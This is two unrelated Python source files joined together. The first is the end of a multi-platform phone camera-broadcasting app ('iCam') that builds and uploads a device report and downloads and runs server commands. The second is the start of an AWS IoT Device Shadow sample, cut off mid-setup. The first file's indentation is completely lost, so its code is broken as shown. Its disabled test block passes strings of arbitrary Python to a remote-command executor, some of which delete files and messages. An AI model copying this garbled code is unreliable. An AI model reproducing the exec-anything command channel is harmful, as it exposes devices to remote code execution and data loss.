cameraMode[0], cameraMode[1],
orientationForThisPhoneModel)
if numCamerasSupported > 0:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "Main camera: possible photo resolutions: for " \
"JPEG_Exif %s; for RGB24 %s. " % \
(cameraPhotoSizes_JPEG_Exif[0],
cameraPhotoSizes_RGB24[0])
myText += "image_modes() = %s. flash_modes() = %s, " \
"max_zoom() = %d, exposure_modes() = %s, " \
"white_balance_modes() = %s.\n" % \
(camera.image_modes(), camera.flash_modes(),
camera.max_zoom(), camera.exposure_modes(),
camera.white_balance_modes())
if numCamerasSupported == 2:
"""
camera.release()
#camera._my_camera = camera._camera.Camera(1)
camera.UseCamera(1)
"""
myText += "VGA camera: possible photo resolutions: for " \
"JPEG_Exif %s, RGB24 %s.\n" % \
(cameraPhotoSizes_JPEG_Exif[1],
cameraPhotoSizes_RGB24[1])
if camera2IsImported:
# NOTE(review): these wrapper calls are given the
# camera.device[1].*_modes() results as arguments
# (e.g. camera.image_modes(camera.device[1].image_modes())),
# unlike the argument-less calls above - verify this is
# what the camera wrapper API expects.
myText += "image_modes() = %s. flash_modes() = %s, " \
"max_zoom() = %d, exposure_modes() = %s, "\
"white_balance_modes() = %s. \n" % \
(camera.image_modes(
camera.device[1].image_modes()),
camera.flash_modes(
camera.device[1].flash_modes()),
camera.max_zoom(),
camera.exposure_modes(
camera.device[1].exposure_modes()),
camera.white_balance_modes(
camera.device[1].white_balance_modes()))
else:
"""
!!!!Should switch to the VGA camera
#myText += "image_modes() = %s. flash_modes() = %s, " \
# "max_zoom() = %d, exposure_modes() = %s, "\
# "white_balance_modes() = %s. "
# % (camera.image_modes(),
# camera.flash_modes(),
# camera.max_zoom(),
# camera.exposure_modes(),
# camera.white_balance_modes())
"""
pass
"""
camera.release()
#camera._my_camera = camera._camera.Camera(0)
camera.UseCamera(0)
"""
else:
pass
except:
DebugPrintErrorTrace()
# Here we were setting the video recording configuration for camera 0.
if SYMBIAN_OS:
try:
if camera2IsImported:
myText += myTextMainCamera2Video
except:
DebugPrintErrorTrace()
try:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "sensorsAvailable = %s. Active profile = %s. " \
"ring_type = %s. \n" % \
(sensorsAvailable, sysinfo.active_profile(),
sysinfo.ring_type())
else:
pass
except:
DebugPrintErrorTrace()
# Memory / storage report (S60 via sysinfo & miso; Android via free space).
try:
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# It seems always GetFreeDriveSpace("D:") = free_ram().
myText += "total_ram = %d, max_ramdrive_size = %d, " \
"free_ram = %d. total_rom = %d. Free space in " \
"bytes on drive C = %d, on drive D = %d, on drive " \
"E = %d. \n" % \
(sysinfo.total_ram(), myMaxRamdriveSize,
GetFreeRAM(), sysinfo.total_rom(),
GetFreeDriveSpace("C:"), GetFreeDriveSpace("D:"),
GetFreeDriveSpace("E:"))
if misoIsImported:
myText += "miso: num_alloc_heap_cells() = %d, " \
"num_free_heap_cells() = %d, " \
"alloc_heap_cells_size() = %d, " \
"heap_total_avail() = %d, " \
"heap_biggest_avail() = %d, " \
"heap_base_address() = %d, stack_info() = %s. \n" % \
(miso.num_alloc_heap_cells(),
miso.num_free_heap_cells(),
miso.alloc_heap_cells_size(),
miso.heap_total_avail(),
miso.heap_biggest_avail(),
miso.heap_base_address(),
str(miso.stack_info()))
elif ANDROID_OS:
myText += "Free space in bytes on LOCAL_DRIVE = %d. \n" % \
GetFreeDriveSpace(LOCAL_DRIVE)
except:
DebugPrintErrorTrace()
# Battery, debug switches, paths and QoS configuration summary.
try:
myText += "battery = %d. charger_status = %d. \n" % \
(GetBatteryLevelPercentage(), GetChargerStatus())
myText += "MY_DEBUG_STDOUT = %d, MY_DEBUG_STDERR = %d, " \
"MY_DEBUG_STDERR_2 = %d, MY_DEBUG_UPLOAD_MSG = %d. \n" % \
(MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
MY_DEBUG_UPLOAD_MSG)
myText += "LOCAL_FOLDER = %s, LOCAL_FOLDER_MEDIA_FILES = %s.\n" \
"STDOUT file name = %s. STDERR file name = %s.\n" % \
(LOCAL_FOLDER, LOCAL_FOLDER_MEDIA_FILES, stdoutFileName,
stderrFileName)
myText += "startAutomatically = %d. \n" % \
startAutomatically
myText += "uploadMediaToYouTube = %d, uploadMediaToPicasa = %d, " \
"useiCamServer = %d. " % \
(uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer)
"""
myText += "uploadMediaToYouTube = %d, uploadMediaToPicasa = %d, " \
"useiCamServer = %d, USE_ICAM_SERVER = %d." \
% (uploadMediaToYouTube, uploadMediaToPicasa,
useiCamServer, USE_ICAM_SERVER)
"""
myText += "internetUploadMaxErrors = %d. " \
"QoS params: storeLocallyMedia = %d, " \
"saveUnsentPackets = %d, " \
"SOCKET_DEFAULT_TIMEOUT = %.2f, uploadUnsentData = %d, " \
"uploadHowManyOfLatestBluetoothMessages = %d, " \
"MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = %d, " \
"ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = %d. " % \
(
internetUploadMaxErrors,
storeLocallyMedia,
saveUnsentPackets,
SOCKET_DEFAULT_TIMEOUT,
uploadUnsentData,
uploadHowManyOfLatestBluetoothMessages,
MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD,
ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ
)
myText += "ICAM_SERVER_NAME = %s.\n" % ICAM_SERVER_NAME
myText += "BATTERY_LEVEL_THRESHOLD = %d.\n" % BATTERY_LEVEL_THRESHOLD
myText += "localPhotoResolution = %s.\n" % str(localPhotoResolution)
myText += "localVideoMode = %s; localVideoModeIndex = %s.\n" % \
(str(localVideoMode), str(localVideoModeIndex))
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
myText += "displaySize = %s.\n" % str(sysinfo.display_pixels())
# displaySize
else:
pass
except:
DebugPrintErrorTrace()
# Publish the assembled report for MainLog() to upload later.
myTextInit = myText
DebugPrint(myText)
def MainLog():
"""First-network-contact phase of startup.

Ensures server accounts are selected, downloads and executes pending
server commands (in a worker thread on the E7, synchronously elsewhere),
uploads the startup text built by MainLog2() when MY_DEBUG_UPLOAD_MSG is
set, and re-applies the stored photo/pause/zoom settings with state
storing temporarily disabled.  Bluetooth clients (bluetoothMode == 2)
skip all Internet access.
"""
global localVideoMode
global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
DebugPrint("Entered MainLog().")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS or ANDROID_OS:
if googleUsername is None:
SelectServersMenu()
if bluetoothMode != 2: # A BT client does NOT have Internet access
if deviceId == IMEI_E7:
"""
For the first access to the Internet we create a separate thread
and wait (but keep the UI responsive), since this access could
take long - it sets up the AP connection, etc.
The downloadCommandsCounter gets incremented/reset after every
Inet access.
"""
"""
We can set firstTime=-1 on SYMBIAN_OS, but it's required to be bool
on ANDROID_OS.
"""
SetMenu(firstTime=-1)
# This assignment has to be put before MyThreadStart(DownloadCommands)
crtDownloadCommandsCounter = downloadCommandsCounter
"""
We can execute DownloadCommands in a separate thread or
NOT (in case we run PyS60 1.4.5).
"""
MyThreadStart(DownloadCommands)
DebugPrint("MainLog(): Waiting for the DownloadCommands() " \
"thread to finish.")
"""
This primitive synchronization is OK - even if for some strange
reason downloadCommandsCounter changes before the other thread
finishes, we get out from waiting in this thread and proceed
without having some race conditions (I think).
Worst case we end up waiting quite a lot (once it was ~2 minutes?? :o )
until the while loop ends, even if we have SOCKET_DEFAULT_TIMEOUT = 20 -
see Z:\1PhD\ReVival\Logs\NokiaE7\2013_06_23_7_interesting_maybe_sync_issues\stdout_2013_06_23_14_44_26.txt.
"""
while crtDownloadCommandsCounter == downloadCommandsCounter:
SleepAndPetWatchdog(1.0)
#e32.ao_yield()
DebugPrint("MainLog(): DownloadCommands() thread finished.")
#SetMenu(firstTime=True)
SetMenu(firstTime=False)
else:
"""
def DownloadCommmandsThread():
DownloadCommands()
#thread.start_new_thread(DownloadCommmandsThread, ())
MyThreadStart(DownloadCommmandsThread)
"""
DownloadCommands()
# Otherwise the application gets blocked at .sms_send()
#if signalStrength != NO_GSM_SIGNAL_STRENGTH:
#if deviceId == IMEI_6120: #Nokia 6120
#if deviceId == INTERNET_PROXY_PHONE_DEVICE_ID:
if accessPointName == u"RDSPP":
CommunicateWithOperator()
"""
if accessPointRetryConnect:
CommunicateWithOperator()
"""
if MY_DEBUG_UPLOAD_MSG:
# On WINDOWS_OS, this can give exception because BLUETOOTH_INBOX_PATH == None. This is acceptable...
# UploadText(myText, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
UploadGZippedData(deviceId, myTextInit, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
global STORE_STATE
# Disable state storing while re-applying the settings below so each
# Set*() call does not persist state individually; re-enabled after.
STORE_STATE = False
try:
# The Set*(value) calls appear to be menu-callback factories: the
# outer call builds the handler and the trailing () applies it -
# presumably; confirm against their definitions elsewhere in the file.
SetUploadedPhotoResolutionIndex(photoResolutionIndex)()
SetPhotoQuality(photoQuality)()
# Can take it out, since the implementation does not change anything from
# the menu.
SetPauseInterval(pauseInterval)()
# e32.ao_sleep(5)
SetDigitalZoom(digitalZoom)()
except:
DebugPrintErrorTrace()
STORE_STATE = True
SetMenu()
StoreState()
"""
DebugPrint("Main(): Calling myTimer.after(..., ReactiveLoop).")
# To avoid getting "Photo request ongoing" exception, because the
# view-finder is started in SetDigitalZoom, but SetPauseInterval calls a
# take_photo().
#e32.ao_sleep(1)
try:
# Wait for 10 seconds - Nokia 6680 takes long to start the application.
myTimer.after(10, ReactiveLoop)
except:
DebugPrint("Main(): myTimer.after(..., ReactiveLoop) returned " \
"exception.")
DebugPrintErrorTrace()
"""
"""
#if phoneModel in ["NokiaE7", "NokiaN8"]:
if SYMBIAN_3:
SetUIOrientation(1)
"""
def MainTestCommands():
"""Developer scratchpad for testing exotic ExecuteCommands() payloads.

The unconditional return below disables the function: everything after
it is intentionally unreachable experimentation code (remote-command
syntax probes, a desktop Bluetooth file-upload test) kept for reference.
"""
global bluetoothMode
return
# NOTE: all code below this return is dead/disabled test code.
"""
# ######################A TEST - EXOTIC COMMANDS, ETC######################
"""
# We get: "SyntaxError: invalid syntax"
#ExecuteCommands("exec-security-issues import glob; for filename " \
# "in glob.glob('E:/iCam/std*.txt'): print filename")
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); print lst")
# I get "SyntaxError: invalid syntax" (Note: we used list comprehension)
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); " \
# "print elem for elem in lst")
# print is not a function in Py 2.x
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); map(print, lst)")
if True:
# if False:
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); print lst; " \
# "map(os.remove, lst)")
# GOOD:
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); lst.remove(0); " \
# "lst.remove(0); print lst; map(os.remove, lst)")
# It works
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr")
# I get "SyntaxError: invalid syntax":
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "if (aStr[0] == 'a'): print aStr")
# I get " SyntaxError: unexpected EOF while parsing":
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr if (aStr[0] == 'a')")
if False:
# I get "SyntaxError: invalid syntax".
#ExecuteCommands("exec-security-issues " \
# "lst = os.listdir('Z:\\iCam'); def MyFunc(aStr): "\
# "if (aStr[0] == 'a'): print aStr; map(MyFunc, lst)")
# It works:
ExecuteCommands("exec-security-issues " \
"lst = os.listdir('Z:\\iCam'); " \
"lst2 = [elem + 'Alex' for elem in lst]; " \
"print lst2")
if False:
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "os.remove(aStr) if (aStr[len(aStr) - 4:] == '.txt') " \
# "else None")
# This is OK.
# ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr if (aStr[len(aStr) - 4:] == 'abla') else None")
# This is OK.
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"print aStr if (aStr[len(aStr) - 4:] == 'abla') " \
"else None; MyFunc('abla')")
# ExecuteCommands("exec-security-issues MyFunc('abla')")
if False:
# It actually puts all statements inside the body of MyFunc()
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
if True:
# It works - note that we used instead of a standard for loop with range a list comprehension - because it was giving parsing errors
ExecuteCommands("exec-security-issues " \
# "btMsgList = bluetoothInbox.list_messages(0x10009ED5); " \
"btMsgList = [1, 2, 3, 4, 5, 6, 7, 8, 9]; " \
"[ BluetoothDeleteMessage(btMsgList[i]) for i in range(100) ]")
if False:
# We get "SyntaxError: invalid syntax" seems because of the for
ExecuteCommands("exec-security-issues " \
"btMsgList = bluetoothInbox.list_messages(0x10009ED5); " \
"for i in range(100): " \
"BluetoothDeleteMessage(btMsgList[i])")
if True:
ExecuteCommands("exec-security-issues def MyFuncLocal(aStr): "\
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:/iCam/std*.txt'); " \
# "for filename in lst: print filename")
quit()
"""
Test sending a file via Bluetooth on the desktop - the file to be sent
is specified in inputVideoFile and will get saved on the disk.
"""
inputVideoFile = "Z:/1PhD/ReVival/iCamViewer/2010_06_22_16_05_29_1.3gp"
videoFileName = "2010_06_22_16_05_29_1.3gp"
videoPathFileName = inputVideoFile
cameraId = 0
#res = UploadStateAndFileAndStoreState(deviceId, videoFileName, cameraId,
# OUTPUT_VIDEO_PATH_FILENAME, ICAM_SERVER_NAME,
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
# BT client
bluetoothMode = 2
# IMEI_WinOS
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=False)
quit()
if WINDOWS_OS:
execfile("iCamWinTest.py") # !!!!TODO: do import iCamWinTest and use iCamWinTest. where required
def MainStartReactiveLoops():
"""Final startup stage: kick off the capture loop for the current OS.

Runs AutoUpdate(), optionally uploads unsent logs, force-enables
auto-start for a list of known devices, logs to the YouTube playlist
(unless this is a Bluetooth client), then dispatches to the per-OS
reactive loop.  On S60 the function then blocks on appLock until Quit()
signals it.
"""
global startAutomatically, startButtonPressed, uploadMediaToYouTube
DebugPrint("Entered MainStartReactiveLoops().")
# We put them after "Started application"... - this is more natural, since
# we want the application to send to server at least "Started"... :)
AutoUpdate()
if pauseInterval != 0:
# if (pauseInterval != 0) and (deviceId != IMEI_N95):
# Note: 'and' binds tighter than 'or', so this groups as
# conserveEnergy or ((uploadUnsentData != 2) and (uploadUnsentData != 3))
# - matching the commented-out equivalent below.
if conserveEnergy or (uploadUnsentData != 2) and \
(uploadUnsentData != 3):
pass
else:
#if conserveEnergy or (uploadUnsentData != 2 and uploadUnsentData != 3):
UploadUnsentLogs()
# These devices always start broadcasting without a button press.
if deviceId in [IMEI_HTC_TC, IMEI_6120, IMEI_6680, IMEI_N82, IMEI_N95]:
startAutomatically = True
if startAutomatically:
startButtonPressed = True
if bluetoothMode != 2:
"""
If this is a BT client device then we
normally can't connect to the Internet.
Especially for Symbian OS phones this is a good idea
since if it doesn't have an AcessPoint (which is normally
the case) it will ask when calling this function for
the AP, which will basically block the application.
"""
LogToYouTubePlaylist()
# Per-OS dispatch of the main reactive loop.
if ANDROID_OS:
if startButtonPressed:
ReactiveLoop()
else:
# We do a non-busy waiting forever loop.
while True:
time.sleep(3600.0)
elif SYMBIAN_S60_OS:
#elif SYMBIAN_OS:
if deviceId in [IMEI_G810]:
#if deviceId in [IMEI_E7, IMEI_G810]:
# global uploadMediaToYouTube
uploadMediaToYouTube = True
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
connResult = ConnectToYouTubeGData()
GetYouTubeUserProfile()
if startButtonPressed:
ReactiveLoop()
elif SYMBIAN_UIQ_OS:
pass
elif iOS_PYOBJC:
try:
ReactiveLoop()
except:
#[self presentModalViewController:ipc animated:YES]
# self.presentModalViewController_animated_(ipc, True)
# I get AttributeError: 'PYApplication' object has no attribute
# 'presentModalViewController_animated_':
#UIApplicationInstance.presentModalViewController_animated_(ipc, objC.YES)
# Not good I think: self.presentModalViewController_(ipc)
# self.animated_(True)
DebugPrintErrorTrace()
elif WINDOWS_CE_OS_PYTHONCE:
# ReactiveLoop()
ReactiveLoop()
elif WINDOWS_OS:
#execfile("iCamWinTest.py") # execfile() doesn't work well when executed in a function
TestWINDOWS_OS()
elif RASPBIAN_OS:
# ReactiveLoop()
ReactiveLoop()
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# The application waits for the signal from Quit(), in order to exit.
appLock.wait()
###############################################################################
###############################################################################
###############################################################################
###########################END PROGRAM Main()##################################
###############################################################################
###############################################################################
"""
try:
# !!!!This implies that if I want to change uploadMediaToYouTube or
# uploadMediaToPicasa, I have to quit the app to allow loading these
# modules.
if uploadMediaToYouTube or uploadMediaToPicasa:
import atom
import gdata.media
if uploadMediaToYouTube:
import gdata.youtube
import gdata.youtube.service
if uploadMediaToPicasa:
import gdata.photos
# Gives MemoryError if I use default.py the plain text script
import gdata.photos.service
#import gdata.tlslite.utils.Python_AES
gdataModulesImported = True
except:
#gdataModulesImported = False
DebugPrint("Unable to import the gdata (and atom) modules.")
DebugPrintErrorTrace()
"""
# displayInfo = -1 # None
# It is a function defined later. (I should not define it None).
# Menu definition shared by the PyS60 and Android UIs.  Keys carry a
# numeric/alpha prefix that presumably controls menu ordering - TODO
# confirm against the menu-building code.  Each value is a 4-tuple
# (label, handler, ?, ?); the last two slots are always None here and
# their meaning is not visible in this chunk - verify before use.
menuTable = {
"00Start": (u"Start Broadcasting", ReactiveLoopOnlyIfStartButtonNotAlreadyPressed, None, None),
# See http://developer.android.com/reference/android/R.drawable.html for the various icon name strings.
"00Stop": (u"Stop Broadcasting", StopBroadcasting, None, None),
"01CaptureWhat": (u"Capture What", CaptureWhatMenu, None, None),
# x icon - "ic_delete"
#"0Exit": (u"Exit", Quit, None, None),
# !!!!not used
# x icon - "ic_delete"
"0Exit": (u"Stop", ReactiveLoopStop, None, None),
#"0Servers": (u"YouTube/Picasa", SelectServersMenu, None, None),
"0Servers": (u"Select Servers", SelectServersMenu, None, None),
"Display_Info": (u"Display Info", DisplayExtensiveInfo, None, None),
# pencil icon "ic_menu_edit"
"1Pause_Interval": (u"Pause Interval", PauseIntervalMenu, None, None),
#"1Record_Duration_Main": (u"Record Config", SetRecordDurationMenu(0), None, None),
"1Record_Config": (u"Record Config", RecordConfigMenu, None, None),
"Select_BT_Mode": (u"Bluetooth Intranet", SelectBluetoothMode, None, None),
# Only used by the PyS60 version:
"Settings": (u"Settings", None, None, None),
# Only used by the Android version:
"zzMisc": (u"Misc", MiscellaneousSettingsMenu, None, None)
}
# Optional launch of the Nokia UserEmulator tool on Symbian.  Disabled in
# this build: START_USER_EMULATOR is hard-coded to False just below.
if SYMBIAN_OS:
START_USER_EMULATOR = False
if START_USER_EMULATOR:
DebugPrint("Starting UserEmulator.")
try:
#UserEmulator said:"Argument doesn't contain any valid script name!"
#res = e32.start_exe(r"C:\sys\bin\UserEmulator_0x2001C3AF.exe",
# "E:\\Start_JoikuSpot.xml")
# Note: UserEmulator seems must not be started for the script to
# execute well.
resGlobal = e32.start_exe(r"C:\sys\bin\UserEmulator_0x2001C3AF.exe",
"Start_JoikuSpot.xml")
#resGlobal = e32.start_exe(
# r"C:\sys\bin\UserEmulator_0x2001C3AF.exe", "Alex.xml")
DebugPrint(" e32.start_exe() returned %s." % str(resGlobal))
except:
DebugPrintErrorTrace()
# Script entry point.
if __name__ == "__main__":
Main()
#figleaf.stop()
#figleaf.write_coverage('.figleaf')
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
# ---- Command-line arguments -------------------------------------------------
# --cert/--key are required for mTLS; --use-websocket switches to SigV4-signed
# websockets and then uses --signing-region instead.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
                                                      "Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
                                      "Necessary if MQTT server uses a certificate that's not already in " +
                                      "your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
    help="To use a websocket instead of raw mqtt. If you " +
    "specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
    "is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
    help='Logging level')

# Using globals to simplify sample code
is_sample_done = threading.Event()  # set by on_disconnected(); __main__ blocks on it
mqtt_connection = None              # assigned in __main__ once connected
shadow_client = None                # iotshadow.IotShadowClient, assigned in __main__
thing_name = ""                     # populated from --thing-name in __main__
shadow_property = ""                # populated from --shadow-property in __main__

SHADOW_VALUE_DEFAULT = "off"
class LockedData:
    """Mutable sample state shared across threads, guarded by one lock."""

    def __init__(self):
        # A single lock protects both fields below: shadow callbacks run on
        # MQTT client threads while the user-input thread also reads/writes.
        self.lock = threading.Lock()
        # Latch so mqtt_connection.disconnect() is only requested once.
        self.disconnect_called = False
        # Last value this device believes the shadow property holds.
        self.shadow_value = None
# Single shared instance used by all callbacks and threads below.
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
    """Report the shutdown reason, then start a one-time MQTT disconnect.

    Accepts either a message string or an Exception (whose traceback is
    printed). Idempotent: only the first caller triggers the disconnect;
    on_disconnected() later unblocks the main thread.
    """
    # NOTE: intentionally shadows the builtin exit(), following sample style.
    if not isinstance(msg_or_exception, Exception):
        print("Exiting sample:", msg_or_exception)
    else:
        print("Exiting sample due to exception.")
        traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])

    with locked_data.lock:
        if locked_data.disconnect_called:
            return
        print("Disconnecting...")
        locked_data.disconnect_called = True
        disconnect_future = mqtt_connection.disconnect()
        disconnect_future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
    # type: (Future) -> None
    """Completion callback for mqtt_connection.disconnect()."""
    print("Disconnected.")

    # Signal that sample is finished; unblocks is_sample_done.wait() in __main__.
    is_sample_done.set()
def on_get_shadow_accepted(response):
    # type: (iotshadow.GetShadowResponse) -> None
    """Handle the response to the startup GetShadow request.

    Precedence: an already-received delta event wins over this query; then a
    pending delta in the document; then the reported value; otherwise the
    shadow is initialized with SHADOW_VALUE_DEFAULT.
    """
    try:
        print("Finished getting initial shadow state.")

        with locked_data.lock:
            # A delta event may have raced ahead of this response; if it did,
            # it already set the local value and this query result is stale.
            if locked_data.shadow_value is not None:
                print("  Ignoring initial query because a delta event has already been received.")
                return

        if response.state:
            if response.state.delta:
                value = response.state.delta.get(shadow_property)
                if value:
                    print("  Shadow contains delta value '{}'.".format(value))
                    change_shadow_value(value)
                    return

            if response.state.reported:
                value = response.state.reported.get(shadow_property)
                if value:
                    print("  Shadow contains reported value '{}'.".format(value))
                    set_local_value_due_to_initial_query(response.state.reported[shadow_property])
                    return

        # Neither delta nor reported carried the property: seed the shadow.
        print("  Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
        change_shadow_value(SHADOW_VALUE_DEFAULT)
        return

    except Exception as e:
        exit(e)
def on_get_shadow_rejected(error):
    # type: (iotshadow.ErrorResponse) -> None
    """Handle rejection of the startup GetShadow request."""
    if error.code != 404:
        exit("Get request was rejected. code:{} message:'{}'".format(
            error.code, error.message))
        return
    # 404 just means no shadow document exists yet: create one with defaults.
    print("Thing has no shadow document. Creating with defaults...")
    change_shadow_value(SHADOW_VALUE_DEFAULT)
def on_shadow_delta_updated(delta):
    # type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
    """React to a delta event (desired state differs from reported state).

    A None value means the property was deleted from the desired state, in
    which case the default value is restored.
    """
    try:
        print("Received shadow delta event.")
        if delta.state and (shadow_property in delta.state):
            value = delta.state[shadow_property]
            if value is None:
                print("  Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
                change_shadow_value(SHADOW_VALUE_DEFAULT)
                return
            else:
                print("  Delta reports that desired value is '{}'. Changing local value...".format(value))
                change_shadow_value(value)
        else:
            # Delta concerns some other property; nothing to do locally.
            print("  Delta did not report a change in '{}'".format(shadow_property))

    except Exception as e:
        exit(e)
def on_publish_update_shadow(future):
    # type: (Future) -> None
    """Log the outcome of publishing an UpdateShadow request."""
    try:
        future.result()
    except Exception as e:
        print("Failed to publish update request.")
        exit(e)
    else:
        print("Update request published.")
def on_update_shadow_accepted(response):
    # type: (iotshadow.UpdateShadowResponse) -> None
    """Confirm the service accepted our reported-value update.

    response.state.reported may be absent, None, or lack the property, so
    the lookup is guarded. The original bare ``except:`` also swallowed
    SystemExit/KeyboardInterrupt; catch only the lookup failures instead.
    """
    try:
        print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
        print("Enter desired value: ") # remind user they can input new values
    except (AttributeError, KeyError, TypeError):
        # AttributeError: response.state missing; TypeError: reported is None;
        # KeyError: property not in reported.
        exit("Updated shadow is missing the target property.")
def on_update_shadow_rejected(error):
    # type: (iotshadow.ErrorResponse) -> None
    """An update request was rejected by the service; abort the sample."""
    message = "Update request was rejected. code:{} message:'{}'".format(error.code, error.message)
    exit(message)
def set_local_value_due_to_initial_query(reported_value):
    """Adopt the shadow's reported value as the local value (no republish)."""
    with locked_data.lock:
        locked_data.shadow_value = reported_value
    print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
    """Set the local value and publish it as both reported and desired state.

    No-op (besides re-prompting) when the value is already current. The
    publish result is handled asynchronously by on_publish_update_shadow().
    """
    with locked_data.lock:
        if locked_data.shadow_value == value:
            print("Local value is already '{}'.".format(value))
            print("Enter desired value: ") # remind user they can input new values
            return

        print("Changed local shadow value to '{}'.".format(value))
        locked_data.shadow_value = value

        print("Updating reported shadow value to '{}'...".format(value))
        # Setting desired along with reported keeps the two in sync so no
        # new delta event is generated by this update.
        request = iotshadow.UpdateShadowRequest(
            thing_name=thing_name,
            state=iotshadow.ShadowState(
                reported={ shadow_property: value },
                desired={ shadow_property: value },
            )
        )
        future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
        future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
    """Read values from stdin forever; 'exit'/'quit' shuts the sample down.

    Runs as a daemon thread (started in __main__) so it cannot keep the
    process alive after disconnect.
    """
    while True:
        try:
            # Read user input
            new_value = input()

            # If user wants to quit sample, then quit.
            # Otherwise change the shadow value.
            if new_value in ['exit', 'quit']:
                exit("User has quit")
                break
            else:
                change_shadow_value(new_value)

        except Exception as e:
            # input() raises EOFError on closed stdin, among others; treat
            # any failure here as a reason to stop the sample.
            print("Exception on input thread.")
            exit(e)
            break
# Entry point: parse args, build the MQTT connection (mTLS or websocket),
# subscribe to all shadow topics, request the current state, start the
# stdin reader, then block until exit() -> on_disconnected() fires.
if __name__ == '__main__':
    # Process input args
    args = parser.parse_args()
    thing_name = args.thing_name
    shadow_property = args.shadow_property
    io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')

    # Spin up resources
    event_loop_group = io.EventLoopGroup(1)
    host_resolver = io.DefaultHostResolver(event_loop_group)
